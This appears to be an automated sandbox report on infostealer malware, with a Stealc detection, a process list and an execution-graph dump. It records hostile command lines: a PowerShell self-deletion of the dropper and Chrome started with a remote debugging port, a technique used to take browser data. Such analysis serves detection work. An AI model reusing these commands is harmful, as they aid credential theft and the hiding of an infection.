                                                                                                                                                                                                                              Start time:21:15:06
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:55
                                                                                                                                                                                                                              Start time:21:15:06
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:56
                                                                                                                                                                                                                              Start time:21:15:08
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe"
                                                                                                                                                                                                                              Imagebase:0x1e0000
                                                                                                                                                                                                                              File size:2'862'592 bytes
                                                                                                                                                                                                                              MD5 hash:6149ACB6D658FE29407A8AB94D3A0784
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000038.00000003.2987064495.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:57
                                                                                                                                                                                                                              Start time:21:15:11
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe"
                                                                                                                                                                                                                              Imagebase:0xbe0000
                                                                                                                                                                                                                              File size:1'831'936 bytes
                                                                                                                                                                                                                              MD5 hash:C20D4E11E1046A5665D427BB4F6DE39E
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:58
                                                                                                                                                                                                                              Start time:21:15:16
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe"
                                                                                                                                                                                                                              Imagebase:0xde0000
                                                                                                                                                                                                                              File size:968'704 bytes
                                                                                                                                                                                                                              MD5 hash:FB1BFBB2B0FA71F93BEFD137BECD031B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:59
                                                                                                                                                                                                                              Start time:21:15:20
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:4.6%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                Signature Coverage:4%
                                                                                                                                                                                                                                Total number of Nodes:770
                                                                                                                                                                                                                                Total number of Limit Nodes:16
                                                                                                                                                                                                                                execution_graph 12749 6d0c7 12750 6d0d7 12749->12750 12751 6d17b RtlWakeAllConditionVariable 12750->12751 12752 6d17f 12750->12752 13079 59f44 13080 59f4c shared_ptr 13079->13080 13081 5a953 Sleep CreateMutexA 13080->13081 13082 5a01f shared_ptr 13080->13082 13083 5a98e 13081->13083 12580 53c47 12581 53c51 12580->12581 12584 53c5f 12581->12584 12587 532d0 12581->12587 12582 53c68 12584->12582 12606 53810 12584->12606 12610 6c6ac 12587->12610 12589 5336b 12616 6c26a 12589->12616 12591 5333c __Mtx_unlock 12593 6c26a 5 API calls 12591->12593 12594 53350 __floor_pentium4 12591->12594 12595 53377 12593->12595 12594->12584 12597 6c6ac GetSystemTimePreciseAsFileTime 12595->12597 12596 53314 12596->12589 12596->12591 12613 6bd4c 12596->12613 12598 533af 12597->12598 12599 6c26a 5 API calls 12598->12599 12600 533b6 __Cnd_broadcast 12598->12600 12599->12600 12601 6c26a 5 API calls 12600->12601 12602 533d7 __Mtx_unlock 12600->12602 12601->12602 12603 6c26a 5 API calls 12602->12603 12604 533eb 12602->12604 12605 5340e 12603->12605 12604->12584 12605->12584 12607 5381c 12606->12607 12661 52440 12607->12661 12620 6c452 12610->12620 12612 6c6b9 12612->12596 12637 6bb72 12613->12637 12615 6bd5c 12615->12596 12617 6c274 12616->12617 12618 6c292 12616->12618 12617->12618 12643 6c297 12617->12643 12618->12618 12621 6c4a8 12620->12621 12623 6c47a __floor_pentium4 12620->12623 12621->12623 12626 6cf6b 12621->12626 12623->12612 12624 6c4fd __Xtime_diff_to_millis2 12624->12623 12625 6cf6b _xtime_get GetSystemTimePreciseAsFileTime 12624->12625 12625->12624 12627 6cf7a 12626->12627 12629 6cf87 __aulldvrm 12626->12629 12627->12629 12630 6cf44 12627->12630 12629->12624 12633 6cbea 12630->12633 12634 6cc07 12633->12634 12635 6cbfb GetSystemTimePreciseAsFileTime 12633->12635 12634->12629 12635->12634 12638 6bb9c 12637->12638 12639 6cf6b _xtime_get GetSystemTimePreciseAsFileTime 12638->12639 12641 6bba4 __Xtime_diff_to_millis2 __floor_pentium4 12638->12641 12640 6bbcf __Xtime_diff_to_millis2 12639->12640 12640->12641 12642 6cf6b _xtime_get GetSystemTimePreciseAsFileTime 12640->12642 12641->12615 12642->12641 12646 52ae0 12643->12646 12645 6c2ae Concurrency::cancel_current_task 12654 6bedf 12646->12654 12648 52aff 12648->12645 12649 52af4 __fassign 12649->12648 12650 8a671 __fassign 4 API calls 12649->12650 12653 86ccc 12650->12653 12651 88bec __fassign 4 API calls 12652 86cf6 12651->12652 12653->12651 12657 6cc31 12654->12657 12658 6cc3f InitOnceExecuteOnce 12657->12658 12660 6bef2 12657->12660 12658->12660 12660->12649 12664 6b5d6 12661->12664 12663 52472 12665 6b5f1 Concurrency::cancel_current_task 12664->12665 12666 6b658 __fassign __floor_pentium4 12665->12666 12667 88bec __fassign 4 API calls 12665->12667 12666->12663 12668 6b69f 12667->12668 12516 58780 12517 58786 12516->12517 12523 86729 12517->12523 12520 587a6 12522 587a0 12530 86672 12523->12530 12525 58793 12525->12520 12526 867b7 12525->12526 12528 867c3 __fassign 12526->12528 12527 867cd __cftof 12527->12522 12528->12527 12542 86740 12528->12542 12531 8667e __fassign 12530->12531 12532 86685 __cftof 12531->12532 12534 8a8c3 12531->12534 12532->12525 12535 8a8cf __fassign 12534->12535 12538 8a967 12535->12538 12537 8a8ea 12537->12532 12541 8a98a 12538->12541 12539 8d82f __fassign RtlAllocateHeap 12540 8a9d0 __freea 12539->12540 12540->12537 12541->12539 12541->12540 12543 86762 12542->12543 12545 8674d __cftof __freea 12542->12545 12543->12545 12546 8a038 12543->12546 12545->12527 12547 8a050 12546->12547 12549 8a075 12546->12549 12547->12549 12550 90439 12547->12550 12549->12545 12551 90445 __fassign 12550->12551 12552 9044d __cftof __dosmaperr 12551->12552 12554 9052b 12551->12554 12552->12549 12555 9054d 12554->12555 12559 90551 __cftof __dosmaperr 12554->12559 12555->12559 12560 900d2 12555->12560 12559->12552 12561 900e3 12560->12561 12562 90106 12561->12562 12563 8a671 __fassign 4 API calls 12561->12563 12562->12559 12564 8fcc0 12562->12564 12563->12562 12565 8fd0d 12564->12565 12566 8690a __fassign 4 API calls 12565->12566 12570 8fd1c __cftof __fassign 12566->12570 12567 8b67d 4 API calls 12567->12570 12568 8ffbc __floor_pentium4 12568->12559 12568->12568 12569 8c719 GetPEB ExitProcess GetPEB RtlAllocateHeap __fassign 12569->12570 12570->12567 12570->12568 12570->12569 12753 520c0 12754 6c68b __Mtx_init_in_situ 2 API calls 12753->12754 12755 520cc 12754->12755 12756 5e0c0 recv 12757 5e122 recv 12756->12757 12758 5e157 recv 12757->12758 12760 5e191 12758->12760 12759 5e2b3 __floor_pentium4 12760->12759 12761 6c6ac GetSystemTimePreciseAsFileTime 12760->12761 12762 5e2ee 12761->12762 12763 6c26a 5 API calls 12762->12763 12764 5e358 12763->12764 12842 58980 12844 589d8 shared_ptr 12842->12844 12845 58aea 12842->12845 12843 55c10 6 API calls 12843->12844 12844->12843 12844->12845 12876 52e00 12877 52e28 12876->12877 12878 6c68b __Mtx_init_in_situ 2 API calls 12877->12878 12879 52e33 12878->12879 12674 53c8e 12675 53c98 12674->12675 12676 53ca5 12675->12676 12682 52410 12675->12682 12678 53810 4 API calls 12676->12678 12679 53ccf 12676->12679 12678->12679 12680 53810 4 API calls 12679->12680 12681 53cdb 12680->12681 12683 52424 12682->12683 12686 6b52d 12683->12686 12694 83aed 12686->12694 12688 6b5a5 ___std_exception_copy 12701 6b1ad 12688->12701 12690 6b598 12697 6af56 12690->12697 12693 5242a 12693->12676 12705 84f29 12694->12705 12696 6b555 12696->12688 12696->12690 12696->12693 12698 6af9f ___std_exception_copy 12697->12698 12700 6afb2 shared_ptr 12698->12700 12711 6b39f 12698->12711 12700->12693 12702 6b1d8 12701->12702 12704 6b1e1 shared_ptr 12701->12704 12703 6b39f 5 API calls 12702->12703 12703->12704 12704->12693 12706 84f2e __fassign 12705->12706 12706->12696 12707 8d634 __fassign 4 API calls 12706->12707 12710 88bfc __cftof 12706->12710 12707->12710 12708 865ed __fassign 3 API calls 12709 88c2f 12708->12709 12710->12708 12712 6bedf InitOnceExecuteOnce 12711->12712 12713 6b3e1 12712->12713 12714 6b3e8 12713->12714 12722 86cbb 12713->12722 12714->12700 12723 86cc7 __fassign 12722->12723 12724 8a671 __fassign 4 API calls 12723->12724 12727 86ccc 12724->12727 12725 88bec __fassign 4 API calls 12726 86cf6 12725->12726 12727->12725 12880 86a44 12881 86a5c 12880->12881 12882 86a52 12880->12882 12885 8698d 12881->12885 12884 86a76 __freea 12886 8690a __fassign 4 API calls 12885->12886 12887 8699f 12886->12887 12887->12884 12317 5a856 12318 5a870 12317->12318 12319 5a892 shared_ptr 12317->12319 12318->12319 12321 5a94e 12318->12321 12323 5a8a0 12319->12323 12333 57d30 12319->12333 12324 5a953 Sleep CreateMutexA 12321->12324 12322 5a8ae 12322->12323 12325 57d30 7 API calls 12322->12325 12327 5a98e 12324->12327 12326 5a8b8 12325->12326 12326->12323 12328 57d30 7 API calls 12326->12328 12329 5a8c2 12328->12329 12329->12323 12330 57d30 7 API calls 12329->12330 12331 5a8cc 12330->12331 12331->12323 12332 57d30 7 API calls 12331->12332 12332->12323 12334 57d96 __cftof 12333->12334 12371 57ee8 shared_ptr __floor_pentium4 12334->12371 12372 55c10 12334->12372 12336 57dd2 12337 55c10 6 API calls 12336->12337 12338 57dff shared_ptr 12337->12338 12339 57ed3 GetNativeSystemInfo 12338->12339 12340 57ed7 12338->12340 12338->12371 12339->12340 12341 57f3f 12340->12341 12342 58019 12340->12342 12340->12371 12344 55c10 6 API calls 12341->12344 12343 55c10 6 API calls 12342->12343 12346 5804c 12343->12346 12345 57f67 12344->12345 12347 55c10 6 API calls 12345->12347 12348 55c10 6 API calls 12346->12348 12349 57f86 12347->12349 12350 5806b 12348->12350 12382 88bbe 12349->12382 12352 55c10 6 API calls 12350->12352 12353 580a3 12352->12353 12354 55c10 6 API calls 12353->12354 12355 580f4 12354->12355 12356 55c10 6 API calls 12355->12356 12357 58113 12356->12357 12358 55c10 6 API calls 12357->12358 12359 5814b 12358->12359 12360 55c10 6 API calls 12359->12360 12361 5819c 12360->12361 12362 55c10 6 API calls 12361->12362 12363 581bb 12362->12363 12364 55c10 6 API calls 12363->12364 12365 581f3 12364->12365 12366 55c10 6 API calls 12365->12366 12367 58244 12366->12367 12368 55c10 6 API calls 12367->12368 12369 58263 12368->12369 12370 55c10 6 API calls 12369->12370 12370->12371 12371->12322 12373 55c54 12372->12373 12385 54b30 12373->12385 12375 55d17 shared_ptr __floor_pentium4 12375->12336 12376 55c7b __cftof 12376->12375 12377 55da7 RegOpenKeyExA 12376->12377 12378 55e00 RegCloseKey 12377->12378 12380 55e26 12378->12380 12379 55ea6 shared_ptr __floor_pentium4 12379->12336 12380->12379 12381 55c10 4 API calls 12380->12381 12506 88868 12382->12506 12384 88bdc 12384->12371 12387 54ce5 12385->12387 12388 54b92 12385->12388 12387->12376 12388->12387 12389 86da6 12388->12389 12390 86db4 12389->12390 12392 86dc2 __fassign 12389->12392 12394 86d19 12390->12394 12392->12388 12399 8690a 12394->12399 12398 86d3d 12398->12388 12400 8692a 12399->12400 12406 86921 12399->12406 12400->12406 12413 8a671 12400->12413 12407 86d52 12406->12407 12408 86d8f 12407->12408 12409 86d5f 12407->12409 12498 8b67d 12408->12498 12412 86d6e __fassign 12409->12412 12493 8b6a1 12409->12493 12412->12398 12414 8a67b __fassign 12413->12414 12419 8a694 __fassign __freea 12414->12419 12428 8d82f 12414->12428 12416 8694a 12420 8b5fb 12416->12420 12419->12416 12432 88bec 12419->12432 12421 8b60e 12420->12421 12423 86960 12420->12423 12421->12423 12458 8f5ab 12421->12458 12424 8b628 12423->12424 12425 8b63b 12424->12425 12427 8b650 12424->12427 12425->12427 12465 8e6b1 12425->12465 12427->12406 12431 8d83c __fassign 12428->12431 12429 8d867 RtlAllocateHeap 12430 8d87a 12429->12430 12429->12431 12430->12419 12431->12429 12431->12430 12433 88bf1 __fassign 12432->12433 12437 88bfc __cftof 12433->12437 12438 8d634 12433->12438 12452 865ed 12437->12452 12440 8d640 __fassign 12438->12440 12439 8d69c __cftof 12439->12437 12440->12439 12441 8d81b __fassign 12440->12441 12442 8d726 12440->12442 12444 8d751 __fassign 12440->12444 12443 865ed __fassign 3 API calls 12441->12443 12442->12444 12455 8d62b 12442->12455 12445 8d82e 12443->12445 12444->12439 12447 8a671 __fassign 4 API calls 12444->12447 12449 8d7a5 12444->12449 12447->12449 12449->12439 12451 8a671 __fassign 4 API calls 12449->12451 12450 8d62b __fassign 4 API calls 12450->12444 12451->12439 12453 864c7 __fassign 3 API calls 12452->12453 12454 865fe 12453->12454 12456 8a671 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12455->12456 12457 8d630 12456->12457 12457->12450 12459 8f5b7 __fassign 12458->12459 12460 8a671 __fassign 4 API calls 12459->12460 12462 8f5c0 __fassign 12460->12462 12461 8f606 12461->12423 12462->12461 12463 88bec __fassign 4 API calls 12462->12463 12464 8f62b 12463->12464 12466 8a671 __fassign 4 API calls 12465->12466 12467 8e6bb 12466->12467 12470 8e5c9 12467->12470 12469 8e6c1 12469->12427 12474 8e5d5 __fassign __freea 12470->12474 12471 8e5f6 12471->12469 12472 88bec __fassign 4 API calls 12473 8e668 12472->12473 12475 8e6a4 12473->12475 12479 8a72e 12473->12479 12474->12471 12474->12472 12475->12469 12480 8a739 __fassign 12479->12480 12482 8d82f __fassign RtlAllocateHeap 12480->12482 12484 8a745 __fassign __freea 12480->12484 12481 88bec __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12483 8a7c7 12481->12483 12482->12484 12484->12481 12485 8a7be 12484->12485 12486 8e4b0 12485->12486 12487 8e5c9 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12486->12487 12488 8e4c3 12487->12488 12489 8e259 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12488->12489 12490 8e4cb __fassign 12489->12490 12491 8e6c4 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12490->12491 12492 8e4dc __fassign __freea 12490->12492 12491->12492 12492->12475 12494 8690a __fassign 4 API calls 12493->12494 12496 8b6be 12494->12496 12495 8b6ce __floor_pentium4 12495->12412 12496->12495 12503 8f1bf 12496->12503 12499 8a671 __fassign 4 API calls 12498->12499 12500 8b688 12499->12500 12501 8b5fb __fassign 4 API calls 12500->12501 12502 8b698 12501->12502 12502->12412 12504 8690a __fassign 4 API calls 12503->12504 12505 8f1df __cftof __fassign __freea __floor_pentium4 12504->12505 12505->12495 12507 8887a 12506->12507 12508 8690a __fassign 4 API calls 12507->12508 12511 8888f __cftof 12507->12511 12510 888bf 12508->12510 12509 86d52 4 API calls 12509->12510 12510->12509 12510->12511 12511->12384 12943 52b10 12944 52b1c 12943->12944 12945 52b1a 12943->12945 12946 6c26a 5 API calls 12944->12946 12947 52b22 12946->12947 13089 52b90 13090 52bce 13089->13090 13091 6b7fb TpReleaseWork 13090->13091 13092 52bdb shared_ptr __floor_pentium4 13091->13092 13173 687d0 13174 6882a __cftof 13173->13174 13180 69bb0 13174->13180 13178 688d9 std::_Throw_future_error 13179 6886c __floor_pentium4 13193 69ef0 13180->13193 13182 69be5 13197 52ce0 13182->13197 13184 69c16 13206 69f70 13184->13206 13186 68854 13186->13179 13187 543f0 13186->13187 13188 6bedf InitOnceExecuteOnce 13187->13188 13189 5440a 13188->13189 13190 54411 13189->13190 13191 86cbb 4 API calls 13189->13191 13190->13178 13192 54424 13191->13192 13194 69f0c 13193->13194 13195 6c68b __Mtx_init_in_situ 2 API calls 13194->13195 13196 69f17 13195->13196 13196->13182 13198 52d1d 13197->13198 13199 6bedf InitOnceExecuteOnce 13198->13199 13200 52d46 13199->13200 13201 52d51 __floor_pentium4 13200->13201 13202 52d88 13200->13202 13211 6bef7 13200->13211 13201->13184 13204 52440 4 API calls 13202->13204 13205 52d9b 13204->13205 13205->13184 13207 69fef shared_ptr 13206->13207 13210 6a058 13207->13210 13224 6a210 13207->13224 13209 6a03b 13209->13186 13212 6bf03 Concurrency::cancel_current_task 13211->13212 13213 6bf73 13212->13213 13214 6bf6a 13212->13214 13216 52ae0 5 API calls 13213->13216 13218 6be7f 13214->13218 13217 6bf6f 13216->13217 13217->13202 13219 6cc31 InitOnceExecuteOnce 13218->13219 13220 6be97 13219->13220 13221 6be9e 13220->13221 13222 86cbb 4 API calls 13220->13222 13221->13217 13223 6bea7 13222->13223 13223->13217 13225 6a290 13224->13225 13231 671d0 13225->13231 13227 6a2cc shared_ptr 13228 6a4be shared_ptr 13227->13228 13229 53ee0 3 API calls 13227->13229 13228->13209 13230 6a4a6 13229->13230 13230->13209 13232 67211 13231->13232 13239 53970 13232->13239 13234 67446 __floor_pentium4 13234->13227 13235 672ad __cftof 13235->13234 13236 6c68b __Mtx_init_in_situ 2 API calls 13235->13236 13237 67401 13236->13237 13244 52ec0 13237->13244 13240 6c68b __Mtx_init_in_situ 2 API calls 13239->13240 13241 539a7 13240->13241 13242 6c68b __Mtx_init_in_situ 2 API calls 13241->13242 13243 539e6 13242->13243 13243->13235 13245 52f06 13244->13245 13246 52f7e GetCurrentThreadId 13244->13246 13249 6c6ac GetSystemTimePreciseAsFileTime 13245->13249 13247 52f94 13246->13247 13248 52fef 13246->13248 13247->13248 13254 6c6ac GetSystemTimePreciseAsFileTime 13247->13254 13248->13234 13250 52f12 13249->13250 13251 5301e 13250->13251 13257 52f1d __Mtx_unlock 13250->13257 13252 6c26a 5 API calls 13251->13252 13253 53024 13252->13253 13255 6c26a 5 API calls 13253->13255 13256 52fb9 13254->13256 13255->13256 13259 6c26a 5 API calls 13256->13259 13260 52fc0 __Mtx_unlock 13256->13260 13257->13253 13258 52f6f 13257->13258 13258->13246 13258->13248 13259->13260 13261 6c26a 5 API calls 13260->13261 13262 52fd8 __Cnd_broadcast 13260->13262 13261->13262 13262->13248 13263 6c26a 5 API calls 13262->13263 13264 5303c 13263->13264 13265 6c6ac GetSystemTimePreciseAsFileTime 13264->13265 13274 53080 shared_ptr __Mtx_unlock 13265->13274 13266 531c5 13267 6c26a 5 API calls 13266->13267 13268 531cb 13267->13268 13269 6c26a 5 API calls 13268->13269 13270 531d1 13269->13270 13271 6c26a 5 API calls 13270->13271 13279 53193 __Mtx_unlock 13271->13279 13272 531a7 __floor_pentium4 13272->13234 13273 6c26a 5 API calls 13275 531dd 13273->13275 13274->13266 13274->13268 13274->13272 13276 53132 GetCurrentThreadId 13274->13276 13276->13272 13277 5313b 13276->13277 13277->13272 13278 6c6ac GetSystemTimePreciseAsFileTime 13277->13278 13280 5315f 13278->13280 13279->13272 13279->13273 13280->13266 13280->13270 13280->13279 13281 6bd4c GetSystemTimePreciseAsFileTime 13280->13281 13281->13280 12769 6d111 12771 6d122 12769->12771 12772 6d12a 12771->12772 12773 6d199 12771->12773 12774 6d1a7 SleepConditionVariableCS 12773->12774 12776 6d1c0 12773->12776 12774->12776 12776->12771 12929 59adc 12930 59aea 12929->12930 12934 59afe shared_ptr 12929->12934 12931 5a917 12930->12931 12930->12934 12932 5a953 Sleep CreateMutexA 12931->12932 12933 5a98e 12932->12933 12935 55c10 6 API calls 12934->12935 12936 59b7c 12935->12936 12937 58b30 6 API calls 12936->12937 12938 59b8d 12937->12938 12939 55c10 6 API calls 12938->12939 12940 59cb1 12939->12940 12941 58b30 6 API calls 12940->12941 12942 59cc2 12941->12942 13093 53f9f 13094 53fb6 13093->13094 13095 53fad 13093->13095 13096 52410 5 API calls 13095->13096 13096->13094 12829 5215a 12832 6c6fc 12829->12832 12831 52164 12834 6c70c 12832->12834 12835 6c724 12832->12835 12834->12835 12836 6cfbe 12834->12836 12835->12831 12837 6ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 12836->12837 12838 6cfd0 12837->12838 12838->12834 13097 59ba5 13098 59ba7 13097->13098 13099 55c10 6 API calls 13098->13099 13100 59cb1 13099->13100 13101 58b30 6 API calls 13100->13101 13102 59cc2 13101->13102 12301 86629 12304 864c7 12301->12304 12305 864d5 __fassign 12304->12305 12306 86520 12305->12306 12309 8652b 12305->12309 12308 8652a 12315 8a302 GetPEB 12309->12315 12311 86535 12312 8653a GetPEB 12311->12312 12314 8654a __fassign 12311->12314 12312->12314 12313 86562 ExitProcess 12314->12313 12316 8a31c __fassign 12315->12316 12316->12311 12512 5b1a0 12513 5b1f2 12512->12513 12514 5b3ad CoInitialize 12513->12514 12515 5b3fa shared_ptr __floor_pentium4 12514->12515 12728 520a0 12731 6c68b 12728->12731 12730 520ac 12734 6c3d5 12731->12734 12733 6c69b 12733->12730 12735 6c3e1 12734->12735 12736 6c3eb 12734->12736 12737 6c39e 12735->12737 12738 6c3be 12735->12738 12736->12733 12737->12736 12743 6ccd5 12737->12743 12747 6cd0a 12738->12747 12740 6c3d0 12740->12733 12744 6cce3 InitializeCriticalSectionEx 12743->12744 12745 6c3b7 12743->12745 12744->12745 12745->12733 12748 6cd1f RtlInitializeConditionVariable 12747->12748 12748->12740 12777 54120 12778 5416a 12777->12778 12780 541b2 Concurrency::details::_ContextCallback::_CallInContext __floor_pentium4 12778->12780 12781 53ee0 12778->12781 12782 53f48 12781->12782 12786 53f1e 12781->12786 12785 53f58 12782->12785 12787 52c00 12782->12787 12785->12780 12786->12780 12788 52c0e 12787->12788 12794 6b847 12788->12794 12790 52c42 12791 52c49 12790->12791 12800 52c80 12790->12800 12791->12780 12793 52c58 Concurrency::cancel_current_task 12795 6b854 12794->12795 12799 6b873 Concurrency::details::_Reschedule_chore 12794->12799 12803 6cb77 12795->12803 12797 6b864 12797->12799 12805 6b81e 12797->12805 12799->12790 12811 6b7fb 12800->12811 12802 52cb2 shared_ptr 12802->12793 12804 6cb92 CreateThreadpoolWork 12803->12804 12804->12797 12806 6b827 Concurrency::details::_Reschedule_chore 12805->12806 12809 6cdcc 12806->12809 12808 6b841 12808->12799 12810 6cde1 TpPostWork 12809->12810 12810->12808 12812 6b807 12811->12812 12813 6b817 12811->12813 12812->12813 12815 6ca78 12812->12815 12813->12802 12816 6ca8d TpReleaseWork 12815->12816 12816->12813 12948 5af20 12949 5af63 12948->12949 12960 86660 12949->12960 12954 8663f 4 API calls 12955 5af80 12954->12955 12956 8663f 4 API calls 12955->12956 12957 5af98 __cftof 12956->12957 12966 555f0 12957->12966 12959 5b04e shared_ptr __floor_pentium4 12961 8a671 __fassign 4 API calls 12960->12961 12962 5af69 12961->12962 12963 8663f 12962->12963 12964 8a671 __fassign 4 API calls 12963->12964 12965 5af71 12964->12965 12965->12954 12967 55610 12966->12967 12967->12967 12969 55710 __floor_pentium4 12967->12969 12970 522c0 12967->12970 12969->12959 12973 52280 12970->12973 12974 52296 12973->12974 12977 887f8 12974->12977 12980 87609 12977->12980 12979 522a4 12979->12967 12981 87649 12980->12981 12985 87631 __cftof __floor_pentium4 12980->12985 12982 8690a __fassign 4 API calls 12981->12982 12981->12985 12983 87661 12982->12983 12986 87bc4 12983->12986 12985->12979 12987 87bd5 12986->12987 12988 87be4 __cftof 12987->12988 12993 88168 12987->12993 12998 87dc2 12987->12998 13003 87de8 12987->13003 13013 87f36 12987->13013 12988->12985 12994 88178 12993->12994 12995 88171 12993->12995 12994->12987 13022 87b50 12995->13022 12997 88177 12997->12987 12999 87dcb 12998->12999 13000 87dd2 12998->13000 13001 87b50 4 API calls 12999->13001 13000->12987 13002 87dd1 13001->13002 13002->12987 13004 87e09 __cftof 13003->13004 13008 87def 13003->13008 13004->12987 13005 87f69 13007 87f8b 13005->13007 13012 87f77 13005->13012 13030 88241 13005->13030 13006 87fa2 13006->13007 13026 88390 13006->13026 13007->12987 13008->13004 13008->13005 13008->13006 13008->13012 13012->13007 13034 886ea 13012->13034 13015 87f4f 13013->13015 13017 87f69 13013->13017 13014 87fa2 13018 88390 4 API calls 13014->13018 13021 87f8b 13014->13021 13015->13014 13015->13017 13020 87f77 13015->13020 13016 88241 4 API calls 13016->13020 13017->13016 13017->13020 13017->13021 13018->13020 13019 886ea 4 API calls 13019->13021 13020->13019 13020->13021 13021->12987 13023 87b62 13022->13023 13024 88ab6 4 API calls 13023->13024 13025 87b85 13024->13025 13025->12997 13028 883ab 13026->13028 13027 883dd 13027->13012 13028->13027 13038 8c88e 13028->13038 13031 8825a 13030->13031 13045 8d3c8 13031->13045 13033 8830d 13033->13012 13035 8875d __floor_pentium4 13034->13035 13037 88707 13034->13037 13035->13007 13036 8c88e __cftof 4 API calls 13036->13037 13037->13035 13037->13036 13041 8c733 13038->13041 13040 8c8a6 13040->13027 13042 8c743 13041->13042 13043 8690a __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 13042->13043 13044 8c748 __cftof 13042->13044 13043->13044 13044->13040 13048 8d3ee 13045->13048 13052 8d3d8 __cftof 13045->13052 13046 8d485 13050 8d4ae 13046->13050 13051 8d4e4 13046->13051 13047 8d48a 13058 8cbdf 13047->13058 13048->13046 13048->13047 13048->13052 13053 8d4cc 13050->13053 13054 8d4b3 13050->13054 13075 8cef8 13051->13075 13052->13033 13071 8d0e2 13053->13071 13064 8d23e 13054->13064 13059 8cbf1 13058->13059 13060 8690a __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 13059->13060 13061 8cc05 13060->13061 13062 8cef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 13061->13062 13063 8cc0d __alldvrm __cftof _strrchr 13061->13063 13062->13063 13063->13052 13066 8d26c 13064->13066 13065 8d2de 13067 8cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 13065->13067 13066->13065 13068 8d2b7 13066->13068 13069 8d2a5 13066->13069 13067->13069 13070 8d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 13068->13070 13069->13052 13070->13069 13072 8d10f 13071->13072 13073 8d14e 13072->13073 13074 8d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 13072->13074 13073->13052 13074->13073 13076 8cf10 13075->13076 13077 8cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 13076->13077 13078 8cf75 13076->13078 13077->13078 13078->13052 13282 53fe0 13283 54022 13282->13283 13284 540d2 13283->13284 13285 5408c 13283->13285 13288 54035 __floor_pentium4 13283->13288 13286 53ee0 3 API calls 13284->13286 13289 535e0 13285->13289 13286->13288 